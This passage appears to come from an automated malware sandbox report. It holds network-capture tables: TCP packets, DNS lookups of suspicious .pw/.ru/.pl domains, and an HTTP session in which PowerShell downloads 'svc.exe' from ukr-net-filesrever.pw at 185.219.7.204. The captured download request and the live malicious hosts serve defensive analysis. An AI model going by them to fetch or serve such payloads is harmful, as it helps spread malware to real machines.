                  Oct 2, 2024 12:25:23.403590918 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.411413908 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.411461115 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.411530018 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.426634073 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.426695108 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.426809072 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.438096046 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.438159943 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.438751936 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.468133926 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.468195915 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.469240904 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.591664076 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.591706038 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.591778040 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.625092983 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.625179052 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.625189066 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.684539080 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.684585094 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.684596062 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.684928894 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.685118914 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.685262918 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.685272932 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.685281992 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.685550928 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.686093092 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.686101913 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.686279058 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.686496019 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.686517000 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.686572075 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.687041998 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.710326910 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.710376978 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.710414886 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.710686922 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.724858046 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.725054026 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.725322962 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.750655890 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.750775099 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.750890970 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:23.940958977 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.941040039 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.941051006 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.941167116 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:23.941207886 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.038012981 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.038048029 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.038055897 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.038234949 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.038235903 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.181024075 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.181134939 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.181144953 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.181539059 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.183923960 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.303189039 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.303215981 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.303229094 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.303400993 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.303725958 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.303741932 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.303853035 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.369947910 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.370161057 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.370172024 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.370281935 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.431885004 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.431922913 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.431932926 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.432046890 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.435597897 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.435616970 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.435627937 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.435641050 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.435709953 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.482955933 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.483211994 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.483226061 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.483347893 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.499284983 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.499996901 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.500010014 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.500083923 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.500107050 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.502827883 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.502840042 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.502849102 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.502911091 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.551183939 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.551199913 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.551209927 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.551394939 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.582752943 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.582770109 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.582779884 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.582964897 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.584394932 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.584404945 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.584417105 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.584428072 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.584451914 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.584474087 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.603075981 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.603106022 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.603322029 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.629821062 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.629962921 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.629997015 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.630146980 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.675570965 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.675610065 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.675645113 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.675772905 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.675774097 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.677630901 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.677648067 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.677704096 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.703525066 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.703707933 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.703746080 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.703800917 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.706851006 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.706883907 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.706914902 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.706917048 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.706979990 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.726888895 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.726969004 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.727001905 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.727109909 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.727910995 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.727958918 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.727993965 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.727993965 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.728051901 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.765968084 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.766016960 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.766052961 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.766099930 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.766221046 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.766258001 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.766354084 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.910131931 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.910151005 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.910162926 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.910353899 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:24.914997101 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.915036917 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:24.915106058 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:25.118585110 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.121606112 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.121716976 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:25.248991966 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.249336958 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.249373913 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.249481916 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:25.252269030 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.252304077 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.252326012 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:25.388956070 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.388994932 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.389007092 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.389105082 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:25.389523983 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.389584064 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:25.389826059 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.389874935 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:25.390122890 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.445530891 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.445652008 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:25.449343920 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.449356079 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:25.449434042 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:25.451987028 CEST4916180192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:25.470613003 CEST8049161185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:56.247064114 CEST4916280192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:56.251868010 CEST8049162185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:56.251939058 CEST4916280192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:56.252652884 CEST4916280192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:56.252680063 CEST4916280192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:56.257448912 CEST8049162185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:56.257529974 CEST8049162185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:57.549443007 CEST8049162185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:57.550517082 CEST8049162185.219.7.204192.168.2.22
                  Oct 2, 2024 12:25:57.550656080 CEST4916280192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:57.551039934 CEST4916280192.168.2.22185.219.7.204
                  Oct 2, 2024 12:25:57.555942059 CEST8049162185.219.7.204192.168.2.22
                  Oct 2, 2024 12:27:08.477576017 CEST4916380192.168.2.22185.219.7.204
                  Oct 2, 2024 12:27:08.482512951 CEST8049163185.219.7.204192.168.2.22
                  Oct 2, 2024 12:27:08.482588053 CEST4916380192.168.2.22185.219.7.204
                  Oct 2, 2024 12:27:08.482836962 CEST4916380192.168.2.22185.219.7.204
                  Oct 2, 2024 12:27:08.482875109 CEST4916380192.168.2.22185.219.7.204
                  Oct 2, 2024 12:27:08.487719059 CEST8049163185.219.7.204192.168.2.22
                  Oct 2, 2024 12:27:08.487749100 CEST8049163185.219.7.204192.168.2.22
                  Oct 2, 2024 12:27:08.805485010 CEST4916380192.168.2.22185.219.7.204
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 2, 2024 12:25:09.609761000 CEST5456253192.168.2.228.8.8.8
                  Oct 2, 2024 12:25:10.290719986 CEST53545628.8.8.8192.168.2.22
                  Oct 2, 2024 12:25:55.389905930 CEST5291753192.168.2.228.8.8.8
                  Oct 2, 2024 12:25:55.931066990 CEST53529178.8.8.8192.168.2.22
                  Oct 2, 2024 12:25:55.936203957 CEST6275153192.168.2.228.8.8.8
                  Oct 2, 2024 12:25:56.246480942 CEST53627518.8.8.8192.168.2.22
                  Oct 2, 2024 12:25:57.560411930 CEST5789353192.168.2.228.8.8.8
                  Oct 2, 2024 12:25:57.599915028 CEST53578938.8.8.8192.168.2.22
                  Oct 2, 2024 12:25:58.496542931 CEST5482153192.168.2.228.8.8.8
                  Oct 2, 2024 12:25:59.021677971 CEST53548218.8.8.8192.168.2.22
                  Oct 2, 2024 12:25:59.037682056 CEST5471953192.168.2.228.8.8.8
                  Oct 2, 2024 12:26:00.048163891 CEST5471953192.168.2.228.8.8.8
                  Oct 2, 2024 12:26:00.726632118 CEST53547198.8.8.8192.168.2.22
                  Oct 2, 2024 12:26:01.354024887 CEST53547198.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:08.098027945 CEST4988153192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:08.106161118 CEST53498818.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:08.106406927 CEST4988153192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:08.442692041 CEST53498818.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:08.443123102 CEST4988153192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:08.450836897 CEST53498818.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:08.468686104 CEST5499853192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:08.476615906 CEST53549988.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:08.822732925 CEST5278153192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:08.859625101 CEST53527818.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:08.859858990 CEST5278153192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:08.866856098 CEST53527818.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:08.866990089 CEST5278153192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:08.901748896 CEST53527818.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:08.907032013 CEST5278153192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:08.914154053 CEST53527818.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:09.286876917 CEST6392653192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:09.882325888 CEST53639268.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:09.882560015 CEST6392653192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:10.887655973 CEST6392653192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:12.283221006 CEST53639268.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:12.283544064 CEST6392653192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:13.487202883 CEST53639268.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:13.487401962 CEST6392653192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:14.482283115 CEST53639268.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:14.565045118 CEST6551053192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:14.615937948 CEST53655108.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:14.616162062 CEST6551053192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:14.639007092 CEST53655108.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:14.641872883 CEST6551053192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:16.203147888 CEST53639268.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:16.307799101 CEST53655108.8.8.8192.168.2.22
                  Oct 2, 2024 12:27:16.307945967 CEST6551053192.168.2.228.8.8.8
                  Oct 2, 2024 12:27:18.603172064 CEST53655108.8.8.8192.168.2.22
                  TimestampSource IPDest IPChecksumCodeType
                  Oct 2, 2024 12:26:01.354141951 CEST192.168.2.228.8.8.8d050(Port unreachable)Destination Unreachable
                  Oct 2, 2024 12:27:16.203227997 CEST192.168.2.228.8.8.8d008(Port unreachable)Destination Unreachable
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 2, 2024 12:25:09.609761000 CEST192.168.2.228.8.8.80xf038Standard query (0)ukr-net-filesrever.pwA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:25:55.389905930 CEST192.168.2.228.8.8.80xa59fStandard query (0)unicexpertmagazine.pwA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:25:55.936203957 CEST192.168.2.228.8.8.80x575cStandard query (0)unicexpertmagazine.pwA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:25:57.560411930 CEST192.168.2.228.8.8.80xebecStandard query (0)ceoconstractionstore.plA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:25:58.496542931 CEST192.168.2.228.8.8.80x15a2Standard query (0)openclehardware.ruA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:25:59.037682056 CEST192.168.2.228.8.8.80xc2c0Standard query (0)informcoopirationunicolceo.ruA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:26:00.048163891 CEST192.168.2.228.8.8.80xc2c0Standard query (0)informcoopirationunicolceo.ruA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.098027945 CEST192.168.2.228.8.8.80xe8fbStandard query (0)unicexpertmagazine.pwA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.106406927 CEST192.168.2.228.8.8.80xe8fbStandard query (0)unicexpertmagazine.pwA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.443123102 CEST192.168.2.228.8.8.80xe8fbStandard query (0)unicexpertmagazine.pwA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.468686104 CEST192.168.2.228.8.8.80x58f7Standard query (0)unicexpertmagazine.pwA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.822732925 CEST192.168.2.228.8.8.80xf219Standard query (0)ceoconstractionstore.plA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.859858990 CEST192.168.2.228.8.8.80xf219Standard query (0)ceoconstractionstore.plA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.866990089 CEST192.168.2.228.8.8.80xf219Standard query (0)ceoconstractionstore.plA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.907032013 CEST192.168.2.228.8.8.80xf219Standard query (0)ceoconstractionstore.plA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:09.286876917 CEST192.168.2.228.8.8.80x8979Standard query (0)openclehardware.ruA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:09.882560015 CEST192.168.2.228.8.8.80x8979Standard query (0)openclehardware.ruA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:10.887655973 CEST192.168.2.228.8.8.80x8979Standard query (0)openclehardware.ruA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:12.283544064 CEST192.168.2.228.8.8.80x8979Standard query (0)openclehardware.ruA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:13.487401962 CEST192.168.2.228.8.8.80x8979Standard query (0)openclehardware.ruA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:14.565045118 CEST192.168.2.228.8.8.80x38c8Standard query (0)informcoopirationunicolceo.ruA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:14.616162062 CEST192.168.2.228.8.8.80x38c8Standard query (0)informcoopirationunicolceo.ruA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:14.641872883 CEST192.168.2.228.8.8.80x38c8Standard query (0)informcoopirationunicolceo.ruA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:16.307945967 CEST192.168.2.228.8.8.80x38c8Standard query (0)informcoopirationunicolceo.ruA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 2, 2024 12:25:10.290719986 CEST8.8.8.8192.168.2.220xf038No error (0)ukr-net-filesrever.pw185.219.7.204A (IP address)IN (0x0001)false
                  Oct 2, 2024 12:25:55.931066990 CEST8.8.8.8192.168.2.220xa59fNo error (0)unicexpertmagazine.pw185.219.7.204A (IP address)IN (0x0001)false
                  Oct 2, 2024 12:25:56.246480942 CEST8.8.8.8192.168.2.220x575cNo error (0)unicexpertmagazine.pw185.219.7.204A (IP address)IN (0x0001)false
                  Oct 2, 2024 12:25:57.599915028 CEST8.8.8.8192.168.2.220xebecName error (3)ceoconstractionstore.plnonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:25:59.021677971 CEST8.8.8.8192.168.2.220x15a2Name error (3)openclehardware.runonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:26:00.726632118 CEST8.8.8.8192.168.2.220xc2c0Name error (3)informcoopirationunicolceo.runonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:26:01.354024887 CEST8.8.8.8192.168.2.220xc2c0Name error (3)informcoopirationunicolceo.runonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.106161118 CEST8.8.8.8192.168.2.220xe8fbNo error (0)unicexpertmagazine.pw185.219.7.204A (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.442692041 CEST8.8.8.8192.168.2.220xe8fbNo error (0)unicexpertmagazine.pw185.219.7.204A (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.450836897 CEST8.8.8.8192.168.2.220xe8fbNo error (0)unicexpertmagazine.pw185.219.7.204A (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.476615906 CEST8.8.8.8192.168.2.220x58f7No error (0)unicexpertmagazine.pw185.219.7.204A (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.859625101 CEST8.8.8.8192.168.2.220xf219Name error (3)ceoconstractionstore.plnonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.866856098 CEST8.8.8.8192.168.2.220xf219Name error (3)ceoconstractionstore.plnonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.901748896 CEST8.8.8.8192.168.2.220xf219Name error (3)ceoconstractionstore.plnonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:08.914154053 CEST8.8.8.8192.168.2.220xf219Name error (3)ceoconstractionstore.plnonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:09.882325888 CEST8.8.8.8192.168.2.220x8979Name error (3)openclehardware.runonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:12.283221006 CEST8.8.8.8192.168.2.220x8979Name error (3)openclehardware.runonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:13.487202883 CEST8.8.8.8192.168.2.220x8979Server failure (2)openclehardware.runonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:14.482283115 CEST8.8.8.8192.168.2.220x8979Server failure (2)openclehardware.runonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:14.615937948 CEST8.8.8.8192.168.2.220x38c8Name error (3)informcoopirationunicolceo.runonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:14.639007092 CEST8.8.8.8192.168.2.220x38c8Name error (3)informcoopirationunicolceo.runonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:16.203147888 CEST8.8.8.8192.168.2.220x8979Server failure (2)openclehardware.runonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:16.307799101 CEST8.8.8.8192.168.2.220x38c8Name error (3)informcoopirationunicolceo.runonenoneA (IP address)IN (0x0001)false
                  Oct 2, 2024 12:27:18.603172064 CEST8.8.8.8192.168.2.220x38c8Name error (3)informcoopirationunicolceo.runonenoneA (IP address)IN (0x0001)false
                  • ukr-net-filesrever.pw
                  • navjbpyetuaao.org
                    • unicexpertmagazine.pw
                  • kwbsyhfpuedti.net
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.2249161185.219.7.204803612C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Oct 2, 2024 12:25:10.301162958 CEST87OUTGET /download/svc.exe HTTP/1.1
                  Host: ukr-net-filesrever.pw
                  Connection: Keep-Alive
                  Oct 2, 2024 12:25:20.716655970 CEST1236INHTTP/1.1 200 OK
                  Server: nginx/1.18.0
                  Date: Wed, 02 Oct 2024 10:25:20 GMT
                  Content-Type: application/x-msdos-program
                  Content-Length: 222720
